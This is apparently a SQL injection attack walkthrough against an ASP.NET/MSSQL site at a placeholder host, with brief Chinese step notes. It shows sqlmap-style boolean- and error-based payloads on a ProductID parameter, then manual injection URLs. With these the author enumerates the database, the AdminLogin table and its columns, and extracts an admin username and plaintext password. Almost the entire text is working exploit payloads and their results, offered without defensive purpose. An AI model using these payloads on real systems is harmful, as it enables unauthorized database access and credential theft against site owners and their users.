---
Parameter: ProductID (GET)
Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ProductID=2' AND 1913=1913 AND 'GquC'='GquC
Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause(IN)
    Payload: ProductID=2' AND 1360 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (1360=1360) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(113))) AND 'JOdp'='JOdp
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2008

1. http://B.com/AutoMain.aspx?ProductID=1' and db_name()>0--
b.com_db

1. http://B.com/AutoMain.aspx?ProductID=1' having 1=1--
Product.ProductID

1. http://B.com/AutoMain.aspx?ProductID=1' and 1=(select top 1 name from sysobjects where xtype='u' and name !='info');--
2. http://B.com/AutoMain.aspx?ProductID=1' and 1=(select top 1 table_name from information_schema.tables);--
此方法可查询任意用户表：
http://B.com/AutoMain.aspx?ProductID=1' and (select top 1 name from (select top 1 id,name from sysobjects where xtype=char(85)) T order by id desc) > 1--
获取到的用户表：
AdminLogin

1. http://B.com/AutoMain.aspx?ProductID=1' and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'AdminLogin') and name<>'id');--
2. http://B.com/AutoMain.aspx?ProductID=1' and 1=(select top 1 column_name from information_schema.columns);--
此方法可查询AdminLogin表的任意列：
3. http://B.com/AutoMain.aspx?ProductID=1' and (select top 1 col_name(object_id('AdminLogin'),1) from sysobjects) > 1--
获取到用户表的列名：
AdminID
UserName
Password

1. http://B.com/AutoMain.aspx?ProductID=1' and (select top 1 UserName from AdminLogin where AdminID=1) > 1--
2. http://B.com/AutoMain.aspx?ProductID=1' and (select top 1 Password from AdminLogin where AdminID=1) > 1--
获取到的账号密码：
admin
islamabad